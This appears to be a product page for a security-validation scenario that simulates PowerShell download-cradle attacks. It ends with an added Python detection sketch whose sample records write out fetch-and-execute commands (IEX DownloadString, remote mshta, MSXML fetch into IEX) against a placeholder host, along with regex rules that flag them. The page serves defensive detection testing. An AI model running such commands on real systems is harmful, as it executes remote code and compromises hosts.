
Suspicious PowerShell Download Cradle Activity

Assets Security
Technical

Overview

🧪 Injects Included in This Scenario

The scenario is composed of five Atomic Red Team payloads, each representing a distinct but related download-and-execute pattern:

1️⃣ Run BloodHound from Memory using Download Cradle (PowerShell) 🧠 Executes BloodHound directly in memory using a PowerShell download cradle (IEX + DownloadString), without touching disk.

2️⃣ Invoke mshta.exe Download (PowerShell) 📥 Uses PowerShell to invoke mshta.exe for remote script execution, a well-known Living-off-the-Land technique.

3️⃣ PowerShell XML Requests 🌐 Leverages PowerShell web/XML request capabilities to retrieve remote content over HTTP/S.

4️⃣ PowerShell MsXml COM Object – With Prompt 🧩 Abuses the MSXML2.XMLHTTP COM object to download external payloads, bypassing common PowerShell cmdlet-based detections.

5️⃣ PowerShell Fileless Script Execution ⚡ Executes remote PowerShell code entirely in memory, leaving minimal forensic artifacts on disk.

🧠 MITRE ATT&CK Mapping

Primary Technique: T1059.001 – Command and Scripting Interpreter: PowerShell

Supporting Techniques:

  • T1105 – Ingress Tool Transfer
  • T1027 – Obfuscated Files or Information
  • T1071.001 – Web Protocols

🛡️ How OpenAev Validates Detection 🧪

OpenAev enables defenders to validate and strengthen detection logic against these attack patterns by:

✅ Simulating realistic attacker tradecraft using Atomic Red Team payloads
✅ Triggering PowerShell telemetry (ScriptBlock, command line, AMSI, process lineage)
✅ Correlating behaviors across execution, network, and process activity
✅ Identifying detection gaps around fileless and LOLBins-based techniques
✅ Providing repeatable, safe validation of SOC and EDR detection rules

💡 This allows security teams to confirm that alerts trigger where expected, and to tune detections for high-risk PowerShell download cradle activity without relying on real malware.
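As an added illustration of the telemetry correlation described above (example code written for this page, not code from the scenario, Atomic Red Team or OpenAev), the following Python sketch runs a handful of pattern rules over constructed sample ScriptBlock/command-line records, one per inject type plus a benign one, and maps each hit back to the ATT&CK techniques listed on this page. The rule regexes, the rule names and the sample records are the editor's assumptions, not the product's rule set.

```python
import re

# Constructed sample records standing in for PowerShell ScriptBlock (Event ID 4104)
# or process command-line telemetry. They are illustrative, not real captures.
SAMPLE_LOGS = [
    (1, "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/SharpHound.ps1')"),
    (2, "Start-Process mshta.exe 'http://example.invalid/run.hta'"),
    (3, "$r = New-Object -ComObject MSXML2.XMLHTTP; $r.open('GET','http://example.invalid/a.txt',$false); $r.send(); IEX $r.responseText"),
    (4, "$xml = New-Object System.Xml.XmlDocument; $xml.Load('http://example.invalid/t.xml')"),
    (5, "powershell -c \"iex (iwr 'http://example.invalid/x.ps1' -UseBasicParsing).Content\""),
    (6, "Get-ChildItem C:\\Users | Select-Object Name"),  # benign control record
]

# Detection rules: (name, ATT&CK technique from this page, compiled regex).
# The indicators are the editor's assumptions of reasonable cradle markers.
RULES = [
    ("iex_downloadstring", "T1059.001",
     re.compile(r"\b(?:iex|invoke-expression)\b.*downloadstring|downloadstring.*\b(?:iex|invoke-expression)\b", re.I)),
    ("mshta_remote", "T1059.001", re.compile(r"\bmshta(?:\.exe)?\b.*https?://", re.I)),
    ("msxml_com_download", "T1105", re.compile(r"msxml2\.(?:server)?xmlhttp|microsoft\.xmlhttp", re.I)),
    ("xml_remote_load", "T1071.001", re.compile(r"xmldocument.*\.load\(\s*['\"]?https?://", re.I)),
    ("fileless_remote_exec", "T1059.001",
     re.compile(r"\b(?:iex|invoke-expression)\b.*(?:https?://|invoke-webrequest|\biwr\b)", re.I)),
]


def classify(script: str) -> list[str]:
    """Return the names of every rule that fires on one script block / command line."""
    return [name for name, _tech, rx in RULES if rx.search(script)]


def scan(records) -> dict[int, list[str]]:
    """Run all rules over all records; only records with at least one hit are returned."""
    hits = {}
    for rec_id, script in records:
        names = classify(script)
        if names:
            hits[rec_id] = names
    return hits


def techniques_for(names) -> set[str]:
    """Map fired rule names to the ATT&CK techniques this scenario page lists."""
    return {tech for name, tech, _rx in RULES if name in names}


if __name__ == "__main__":
    for rec_id, names in scan(SAMPLE_LOGS).items():
        print(rec_id, names, sorted(techniques_for(names)))
```

Record 1 fires two rules on purpose: correlating several weak indicators on one event is what separates a cradle from an ordinary web request, which is the gap the scenario is meant to expose.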

Basic information

Filigran
Sébastien Miguel
January 26, 2026
2.0.14
30+
2